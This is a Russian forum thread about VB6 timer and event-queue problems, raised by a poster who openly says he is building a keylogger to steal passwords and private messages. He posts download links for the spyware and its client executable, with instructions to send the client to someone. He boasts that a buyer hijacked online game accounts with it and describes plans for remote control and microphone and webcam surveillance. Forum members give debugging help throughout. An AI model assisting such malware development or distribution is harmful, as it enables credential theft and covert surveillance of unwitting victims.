|
таймер
|
|||
---|---|---|---|
#18+
имеется таймер с интервалом 1 (1 мск) с содержимым: Код: vbnet 1. 2. 3. 4. 5.
в нём выполняется код по получению нажатой клавиши. на моём компе всё норм. но у других юзеров комп не успевает сделать вышеописанные действия за одну мск. в итоге прога начинает ловить только, например, каждую третью нажатую клавишу. очевидное решение: убрать Код: vbnet 1.
вопрос: можно ли так сделать? ведь будет копиться всё больше и больше невыполнивших свою работу таймеров. или это не страшно? как ещё можно решить проблему? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 18:16 |
|
таймер
|
|||
---|---|---|---|
#18+
Реально таймер в лучшем случае срабатывает раз в 10 мс... брось на форму кнопку и пару таймеров, в модуль вот такой код: Код: vbnet 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24.
и подивись на результат. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 18:49 |
|
таймер
|
|||
---|---|---|---|
#18+
Да, оба таймеры выключены, период - у первого 1 мс, у второго 1000 мс. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 18:50 |
|
таймер
|
|||
---|---|---|---|
#18+
Akinaподивись на результат. 5 раз запустил - 5 раз выдало "64". т.е. одномилисекундный таймер отрабатывает только 64 раза за 1 секунду... коряво, но не очень понимаю, какая параллель с моей проблемой ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 19:07 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0какая параллель с моей проблемойсамая прямая. Не надо убирать отключение таймера. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 19:21 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProBelow0какая параллель с моей проблемойсамая прямая. Не надо убирать отключение таймера. ты мне это когда-то впервые посоветовал) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 19:22 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProЧто - ЭТО? юзать выключения таймера в самом таймере. убрал выключение таймера. + вынес все обращения к хостингу в отдельный независимый медленный таймер. т.е. за счёт уменьшения интервала связи с нетом я уменьшил нагрузку на свой хост и увеличил скорость проги. в идеале до меня дошло, как правильно избежать многократного запуска таймера. например, так: Код: vbnet 1. 2. 3. 4. 5. 6. 7. 8.
тогда время выполнения кода не будет складываться с интервалом таймера. заманался вводить этот тупой код! ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:13 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0юзать выключения таймера в самом таймерену. а разве я сейчас что-то другое советую? то, что ты сейчас написал, бессмысленно (кроме случаев, когда в строке "выполняемый код" есть doevents) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:24 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.Proто, что ты сейчас написал, бессмысленно в коде выше если интервал таймера 5 секунд, а сам код в таймере выполняется 3 секунды, то следующее выполнение кода будет через 5+3=8 секунд. а в варианте, что я выложил, следующий запуск будет, как и задумано, через 5 секунд. моя прога работает идеально) уже не знаю, что ещё в неё такое пихнуть, чтоб прям поражала воображение. продал пока что только одному челу, и он при помощи неё уже переломал половину юзеров одной онлайн игрушки))) надо будет поставить помесячную оплату за пользование прогой. взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:34 |
|
таймер
|
|||
---|---|---|---|
#18+
Еще раз: событие следующего срабатывания таймера не начнется, пока выполняется код предыдущего события (за исключением DoEvens) так что проверять a = True смысла не имеет, а если твой код будет выполняться дольше, чем интервал таймера, события будут накапливаться в очереди и очередь будет расти бесконечно. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:44 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:49 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофа, А мне напоминает анекдот по Неуловимого Джо ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:51 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0не очень понимаю, какая параллель с моей проблемой Да собсно я это к Below0комп не успевает сделать вышеописанные действия за одну мск ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 21:31 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаBelow0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его Готов сломать! ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:07 |
|
таймер
|
|||
---|---|---|---|
#18+
Я тута!катастрофаBelow0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его Готов сломать! скинь любую свою почту. по почте и по учётной записи компа идёт привязка к одному юзеру. за одно потестишь моё произведение искусства и гениальной инженерной мысли ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:21 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0Я тута!пропущено... Готов сломать! скинь любую свою почту. по почте и по учётной записи компа идёт привязка к одному юзеру. за одно потестишь моё произведение искусства и гениальной инженерной мысли Кому: uebanec@bk.ru ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:29 |
|
таймер
|
|||
---|---|---|---|
#18+
Я тута!Below0пропущено... скинь любую свою почту. по почте и по учётной записи компа идёт привязка к одному юзеру. за одно потестишь моё произведение искусства и гениальной инженерной мысли Кому: uebanec@bk.ru воть... http://qlewer.mgn-host.ru/Qlewer.exe в админской части отключена резервная админская отправка, чтоб зря не спамил с почты) в остальном всё работает. можешь взломать кого-нибудь из коллег. через пару часов или завтра отключу программу дистанцинно. файл с клевером на иконке - админская часть. её открываешь сам(привязка по учётной записи юзера. твою я не знаю, поэтому взломаешь сам - для тебя не проблема). а эту http://qlewer.mgn-host.ru/qlewer client.exe прогу отсылаешь кому-нибудь. 1 раз откроешь - перестанет работать, поэтому делай копии. отсылает логи на админускую часть и на твою почту после последних доработок не проверял, но должна работать и приносить радость) вот офиц сайт http://qlewer.mgn-host.ru/ ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:48 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0, Хорошо, завтра посмотрю это дерьмо. Обещаю. А как ты отключишь если я её буду тестить в сети без выхода в интернет? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:52 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯBelow0, Хорошо, завтра посмотрю это дерьмо. Обещаю. А как ты отключишь если я её буду тестить в сети без выхода в интернет? я отключу прогу от выхода в интернет) а так она будет работать. только какой смысл тебе будет от проги, тырящей пароли через интернет без интернета ? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:54 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0, Так что мне надо сделать с твоей поделкой что бы она считалась взломанной? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:56 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯBelow0, Так что мне надо сделать с твоей поделкой что бы она считалась взломанной? хм... взломать её в принципе невозможно. под "взломать" я подразумеваю один из пунктов 1) работа проги вне моего желания (т.е. прога перестаёт принадлежать мне) 2) отказ работы сервера или потеря данных или получение моих или чужих данных с хостинга или использование сервера в своих нуждах я защитил прогу от всего перечисленного(уж как мог). самой уязвимой остаётся админская часть(на то она и админская), т.е. можно заставить её работать без моего желания. но толку от неё без клиентской части9которую я могу заблокировать дистанционно) не будет ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:09 |
|
таймер
|
|||
---|---|---|---|
#18+
кстати, хочешь, расскажу, как взломать этот форум?(защитную картинку) я знаю как, но для этого надо убить целый день. дыра в защите форума устраняется в течении часа... т.е. на флуд будет только около миллиона сообщений) Shocker.Pro, или скажу, где брешь в защите, тебе за разбанивание моего аккаунта) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:27 |
|
таймер
|
|||
---|---|---|---|
#18+
1) Что это означает? У нее есть лицензионное соглашение, где написано, кому она принадлежит? Нужно изменить текст, что бы там было написано, что она больше тебе не принадлежит? Чушь какая-то. Работает она в любом случае независимо от твоего желания. Это исполняемый файл, который исполняет операционка, причем тут твоя личность? 2) Это уже взлом сайта, а не проги. В любом случае можно дописать в файл hosts свой сайт под именем твоего, запросы и ответы посмотреть фиддлером и подделать их на своем сайте. Я не знаю, зачем она постоянно дергает сайт, но если лишь за тем, чтобы проверить, что работать ей дозволяется, то ломается она еще проще - отключением таймера. Или условного перехода, что по сути одно и тоже. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:42 |
|
таймер
|
|||
---|---|---|---|
#18+
AntonariyРаботает она в любом случае независимо от твоего желания что ты понимаешь под "работает"? запускается? так по одному моему желанию она перестанет выполнять свои прямые обязанности, а именно: тырение паролей и переписок. AntonariyЭто исполняемый файл, который исполняет операционка, причем тут твоя личность? без моей личности это всего лишь бесполезный набор байтов AntonariyЯ не знаю, зачем она постоянно дергает сайт, но если лишь за тем, чтобы проверить, что работать ей дозволяется, то ломается она еще проще - отключением таймера. я наивен, но не настолько глуп) AntonariyВ любом случае можно дописать в файл hosts свой сайт под именем твоего, запросы и ответы посмотреть фиддлером и подделать их на своем сайте хм( да, это вполне осуществимо( и как от этого защититься? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:56 |
|
таймер
|
|||
---|---|---|---|
#18+
что ты понимаешь под "работает"? запускается? так по одному моему желанию она перестанет выполнять свои прямые обязанности, а именно: тырение паролей и переписок.Именно это я и хотел узнать - что ТЫ подразумеваешь под "работает". Теперь примерно ясно. без моей личности это всего лишь бесполезный набор байтовЯщитаю, что это оно так и с ней. )) хм( да, это вполне осуществимо( и как от этого защититься?Можно чуть-чуть усложнить задачу используя https (если его поддерживает хостинг), но запросы на поддельном сайте будут так же видны, а ответы твоего сайта можно выдернуть из адресного пространства программы, когда они уже расшифрованы. Копать нужно в сторону исполнения кода в защищенном адресном пространстве. Я слышал, что такое явление существует, но реализации и даже вопросов или обсуждений ни разу не встречал. ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 00:18 |
|
таймер
|
|||
---|---|---|---|
#18+
AntonariyВ любом случае можно дописать в файл hosts свой сайт под именем твоего, запросы и ответы посмотреть фиддлером и подделать их на своем сайте с другой стороны, это равносильно перенаписанию проги, вернее, половины проги, т.к. немалая часть функционала находится на хостинге. единственным разумным выходом в этом случае я вижу перенос как можно большей логической части программы в PHP. в этом случае при попытке взлома ворутся только идея, замысел проги. остальное придётся писАть "от себя" ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 00:21 |
|
таймер
|
|||
---|---|---|---|
#18+
Я тута!катастрофаBelow0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его Готов сломать! как там успехи?) ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 12:48 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0, Интерфейс у админской части убогий до нельзя. Клиент вываливается вот с таким говном. Если поделка не работает то и ломать нечего, вот мой вердикт. ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 13:43 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯBelow0, Интерфейс у админской части убогий до нельзя. Клиент вываливается вот с таким говном. Если поделка не работает то и ломать нечего, вот мой вердикт. интерфейс у админской части очень даже креативный, функционалу позавидует любой современный кейлоггер. насчёт ошибки: х его з, отчего она. т.к. это админская часть, я даже не вникал. на работоспособности проги это никак не отражается Ято и ломать нечего, вот мой вердикт. не по зубам? XDDD Antonariy, в принципе, уже написал единственное уязвимое место моей проги: полное написание с нуля всех фалов на хостинге. больше дыр в защите нет. допишу ещё пару функций для защиты от спама + поддержку программой "добивания" клиента + обновление + сбор логов о попытках копирования и взлома моей проги + переведу больше кода из ехе в PHP + усложню защиту админской части и прога будет просто совершенством) я бы, по крайней мере, купил такую. из-за неё, кстати, я и начал заниматься программированием XDDD моя первая программа ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 13:57 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerнасчёт ошибки: х его з, отчего она. т.к. это админская часть, я даже не вникал. на работоспособности проги это никак не отражается Ещё раз для тупых Клиент вываливается вот с таким говном: ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:02 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯQlewerнасчёт ошибки: х его з, отчего она. т.к. это админская часть, я даже не вникал. на работоспособности проги это никак не отражается Ещё раз для тупых Клиент вываливается вот с таким говном: винда у тебя XP зверь sp3? 12690799 из нескольких десятков челов только у одного была такая ошибка. но у него и другие проги так же вылетали - винда выкабенивалась) чтобы исправить мне нужно будет скачать эту винду и искать ошибку ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:17 |
|
таймер
|
|||
---|---|---|---|
#18+
вспомнил, как я исправил ошибку... on error resume next))))))) ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:20 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerвинда у тебя XP зверь sp3? Говном не пользуюсь. И тебе не советую, а то измажешься весь. У меня вин 7 про 64. ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:23 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯQlewerвинда у тебя XP зверь sp3? Говном не пользуюсь. И тебе не советую, а то измажешься весь. У меня вин 7 про 64. я тестил на разных виндах, на семёрке ошибок не было... ты клиентскую часть на семёрке запускал? что-то по скрину не похоже на 7х64. ща запущу на своей винде ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:26 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerвспомнил, как я исправил ошибку... on error resume next))))))) Ты этой строкой не исправил ошибку, а просто признался в собственной беспомощности. У тебя что коэффициент интеллекта=0? ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:26 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯУ тебя что коэффициент интеллекта=0? BelowZero XDDDDDD у меня тоже есть 7x64. я тестил - ошибок не было. ща запустил.... сижу... слежу за собой... ничего подозрительного не наблюдаю. проблематично исправлять ошибки, которые у тебя лично не возникают) только сидеть гадать ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:54 |
|
таймер
|
|||
---|---|---|---|
#18+
QlewerЯУ тебя что коэффициент интеллекта=0? ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 14:57 |
|
таймер
|
|||
---|---|---|---|
#18+
а где вообще проверяют этот IQ? я помню, нас в садике проверяли на уровень способностей, надо было по значкам лабиринт проходить на картинке, с тех пор никто моими умениями не интересовался... или я болел, когда всех проверяли ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 15:15 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerили я болел, когда всех проверяли ЗЫ: В сети тестов полно. ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 15:17 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯВ момент запуска значит, дело не в проге. просто я все эти дни впихиваю в прогу всё больше и больше функций и, видимо, скомпилировал промежуточный код. воть http://qlewer.mgn-host.ru/qlewerclient.exe по теме топика: прога не успевает улавливать все нажатия при быстром наборе. сейчас код выглядит так: Код: vbnet 1. 2. 3. 4.
я специально вывел все синхронные обращения в отдельный таймер, чтобы запросы не тормозили считывание клавиш. но ничего не изменилось. т.е. синхронные запросы на сервер останавливают всю прогу, а не только свою процедуру? если да, то как исправить? ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 15:42 |
|
таймер
|
|||
---|---|---|---|
#18+
выбило ошибку у клиентской части. т.е. через 3 часа нормальной работы проге вдруг что-то не понравилось... надо полюбэ ставить on error resume next. из-за чего может быть указанная ниже ошибка? ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 18:35 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerиз-за чего может быть указанная ниже ошибка? Готов помочь тебе. Сколько?$ ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 18:47 |
|
таймер
|
|||
---|---|---|---|
#18+
> Автор: Qlewer > из-за чего может быть указанная ниже ошибка? Дык, там-же чёрным по русски написано из-за чего ошибка Posted via ActualForum NNTP Server 1.5 ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 18:47 |
|
таймер
|
|||
---|---|---|---|
#18+
Найду и подскажу что не такQlewerиз-за чего может быть указанная ниже ошибка? Готов помочь тебе. Сколько?$ помочь себя я могу сам. on error resume next. если ошибка возникает раз в несколько часов, значит от игнора этой фигни код сильно не пострадает. но отчего эта ошибка узнать, конешь, хотелось бы ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 18:49 |
|
таймер
|
|||
---|---|---|---|
#18+
Найду и подскажу что не такQlewerиз-за чего может быть указанная ниже ошибка? Готов помочь тебе. Сколько?$ 20 ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 18:51 |
|
таймер
|
|||
---|---|---|---|
#18+
Игорь Горбонос> Автор: Qlewer > из-за чего может быть указанная ниже ошибка? Дык, там-же чёрным по русски написано из-за чего ошибка из-за чего? что это за операция такая, которую приходится всей прогой ждать... и как исправить? эндрю, ты о чём?) ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 18:55 |
|
таймер
|
|||
---|---|---|---|
#18+
Найду и подскажу что не такГотов помочь тебе. Сколько?$ 20 Белов - исправил ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:02 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаНайду и подскажу что не такГотов помочь тебе. Сколько?$ 20 Белов - исправил я всё ещё тебя не понимаю) ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:13 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, спутал топик с этим 12690812 извините, что влажу но я готов 20 ку заплатить если этот спрашивающий цену за устранение устранит её ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:21 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerкатастрофапропущено... 20 Белов - исправил я всё ещё тебя не понимаю) Ты зарабатывать пытаешься не почесав палец о палец. Ты еврей? ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:22 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаQlewer, спутал топик с этим 12690812 извините, что влажу но я готов 20 ку заплатить если этот спрашивающий цену за устранение устранит её я могу устранить за 20$ ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:22 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, ладно завтра выложу, только договор на берегу проповеди типа, что у меня винда зверь меня не устраивают, сделаете - неделю дам ей копоти, потом заплачу, только чувствую, будет так - у меня ошибка вылезет, а Вы будете говорить, что я канючу, не хочу платить ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:27 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаQlewer, ладно завтра выложу, только договор на берегу проповеди типа, что у меня винда зверь меня не устраивают, сделаете - неделю дам ей копоти, потом заплачу, только чувствую, будет так - у меня ошибка вылезет, а Вы будете говорить, что я канючу, не хочу платить как много слов... on error resume next... тести) ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:28 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, я уже 20 ку должен? там код простейший, зачем наворачивать если на мелочи спотыкается то есть если будет а = 4 + 6 тоже надо ждать ошибки? ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 19:30 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerвыбило ошибку у клиентской части. т.е. через 3 часа нормальной работы проге вдруг что-то не понравилось... надо полюбэ ставить on error resume next. из-за чего может быть указанная ниже ошибка? а не... это я случайно промежуточную прогу запустил, она удалила прогу с компа, запихнулась на её место и выдала ошибку. так что всё норм, ошибок нет ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 20:08 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerа не... это я случайно промежуточную прогу запустил, она удалила прогу с компа, запихнулась на её место и выдала ошибку. так что всё норм, ошибок нет Fufel ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 20:28 |
|
таймер
|
|||
---|---|---|---|
#18+
QlewerПокупатель, поясни Орфографические ошибки на странице рекламы, чтение данного форума, отзывы людей. ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 20:32 |
|
таймер
|
|||
---|---|---|---|
#18+
ПокупательОрфографические ошибки на странице рекламы например? сейчас у меня более важная проблема... чел, которому я продал прогу по мелкой цене взломал в игре аккаунтов на 15 тысяч за 3 дня и... сцуко... продал все вещи моему постоянному покупателю... если продажа 1 проги нанесла мне же такой ущерб, что будет дальше((( проще уж самому юзать и не мелькать с прогой на публике... ... |
|||
:
Нравится:
Не нравится:
|
|||
15.06.2012, 20:37 |
|
таймер
|
|||
---|---|---|---|
#18+
Я тута!катастрофаBelow0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его Готов сломать! ты дважды заспамил мне 150мб трафика?))) отключил запись логов ошибок допуска на сервер. клиент жаловался. это ж как надо флудить, чтобы наспамить 300мб... хм. или не ты? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 00:03 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, Ты скоро оч сильно будешь удивлён. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 08:37 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯQlewer, Ты скоро оч сильно будешь удивлён. не томи. или скажи когда. я хоть подготовлюсь, попкорна куплю. пока что всё работает, делаю обнову за обновой, устал уже... в ближайшие дни прога сможет удалённо управлять всем компьютером жертвы. + в дальнейшем объединить с моими проектами по прослушиванию микро и веб - будет вообще круто... но эту мегапрогу я уже продавать не буду. не хватало ещё, чтобы озабоченные малолетки следили за соседками и выкладывали в нэт. обойдутся ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 10:38 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, Не торопи события! Всё не так просто. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 10:46 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯQlewer, Не торопи события! Всё не так просто. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 13:53 |
|
таймер
|
|||
---|---|---|---|
#18+
Всю прогу. Сколько бы таймеров не было, они работают в одном потоке. Пока один таймер не завершит свою процедуру, остальные не тикнут. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 14:40 |
|
таймер
|
|||
---|---|---|---|
#18+
AntonariyВсю прогу. Сколько бы таймеров не было, они работают в одном потоке. Пока один таймер не завершит свою процедуру, остальные не тикнут. понятно, как я и опасался. как исправить? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 15:25 |
|
таймер
|
|||
---|---|---|---|
#18+
Все события в твоей проге (неважно, событие таймера, нажатие на кнопку и т.п.) встают в очередь и обрабатываются твоей прогой последовательно. Единственное что может нарушить это - команда DoEvents - она приостановит процедуру и перенесет ее в конец очереди событий. Когда все остальные события в очереди будут обработаны, процедура возобновит свою работу. То, что ты хочешь, называется "многопоточность" (или многозадачность) и плохо реализуется на VB ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 15:36 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.Pro 12716247 не понимаю, какая тут связь... я ожидал ответа: "вынести обращение к серверу в отдельную программу" или "использовать асинхронный запрос" или что-то в этом роде с объяснением что и как... ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 15:37 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProТо, что ты хочешь, называется "многопоточность" (или многозадачность) и плохо реализуется на VB пожалуй, разделю прогу на 2 части - в одной непосредственно кейл, в другой связь с сервером ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 16:47 |
|
таймер
|
|||
---|---|---|---|
#18+
QlewerShocker.ProТо, что ты хочешь, называется "многопоточность" (или многозадачность) и плохо реализуется на VB пожалуй, разделю прогу на 2 части - в одной непосредственно кейл, в другой связь с сервером придётся переписывать всю прогу для этого... нельзя как-то проще? мне нужно быть уверенным, что всё делаю правильно ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 17:10 |
|
таймер
|
|||
---|---|---|---|
#18+
Если ты там работаешь с запросами к серверу - можно использовать асихронные запросы. Но мне твой код лень разбирать, я просто ответил на отдельно взятый вопрос, чтобы ты лучше понимал систему (у тебя это, вроде, в другое ухо не вылетает, как у ЦЭ) ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 17:21 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProЕсли ты там работаешь с запросами к серверу - можно использовать асихронные запросы это, пожалуй, лучший вариант, чем разбивать прогу на два процесса. вот один из запросов: Код: vbnet 1. 2. 3. 4. 5. 6. 7. 8. 9. 10.
а как правильней всего выполнить асинхронный запрос в данном случае? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 17:28 |
|
таймер
|
|||
---|---|---|---|
#18+
Я это использовал у себя в коде, но наизусть не помню. Лезть искать и вспоминать ради тебя лень, тебе же тоже лень документацию почитать или примеры поискать. Так что будем вместе сидеть и ждать неленивого. ) ЗЫ: Когда я разбирался, как это работает, мне не потребовалась чья-то помощь, достаточно было поиска по форуму. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 17:34 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProТак что будем вместе сидеть и ждать неленивого. )оке, подождём... я представляю примерно, как это будет выглядеть. но хотелось бы знать, как правильно) Shocker.ProЗЫ: Когда я разбирался, как это работает, мне не потребовалась чья-то помощь ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 17:41 |
|
таймер
|
|||
---|---|---|---|
#18+
в принципе, у меня есть пример из моего же топика. 12429889 осталось его усовершенствовать. меня раздражает это "Do events". Shocker.ProЕдинственное что может нарушить это - команда DoEvents - она приостановит процедуру только процедуру? не всю прогу? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 18:22 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerменя раздражает это "Do events".используй события, если раздражает, не устраивай цикл ожидания Qlewerтолько процедуру?только процедуру. При условии, что в очереди событий есть события. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 18:24 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.Pro, попробую создать единый таймер, который будет проверять, установилось ли соединение с сервером авториспользуй события это как? таймер? кстати, вопрос по синтаксису: "<>4" это значит "не равно 4"? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 18:32 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerэто как? таймер?нет. У MSXML2 есть свои события. Ты же в ожидании нажатия кнопки пользователем не крутишь цикл и не используешь таймер ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 18:34 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProУ MSXML2 есть свои события я думал только у объектов на форме и самой формы есть события. подскажешь события? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 18:57 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewerя думал только у объектов на форме и самой формы есть события.события могут быть у любого класса. Форма и элемент на форме - это частный случай. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:02 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProQlewerя думал только у объектов на форме и самой формы есть события.события могут быть у любого класса. Форма и элемент на форме - это частный случай.Можешь создавать свои классы и в них свои события. Это следующий шаг к просветлению и, в принципе, ты наверное уже готов, чтобы его сделать ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:03 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProF2 что там где? MSXML2.XMLHTTP не наблюдаю. расскажешь? ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:07 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.Pro Единственное что может нарушить это - команда DoEvents - она приостановит процедуру и перенесет ее в конец очереди событий.Не совсем так. Это означает обработать сообщения оконной процедуры, то есть накопившиеся клики, тычки в клавиатуру и т.п. в активном окне программы (а так же таймеры, ведь это событие окна WM_TIMER) пока оно висело во время выполнения пользовательской процедуры. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:08 |
|
таймер
|
|||
---|---|---|---|
#18+
AntonariyНе совсем так. Это означает обработать сообщения оконной процедуры, то есть накопившиеся клики, тычки в клавиатуру и т.п. в активном окне программы (а так же таймеры, ведь это событие окна WM_TIMER) пока оно висело во время выполнения пользовательской процедуры.ну для программиста ведь это выглядит именно так, как я описал ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:12 |
|
таймер
|
|||
---|---|---|---|
#18+
Qlewer, Значит надо подключить к проекту референс на Microsoft xml 5 ... |
|||
:
Нравится:
Не нравится:
|
|||
16.06.2012, 19:13 |
|
таймер
|
|||
---|---|---|---|
#18+
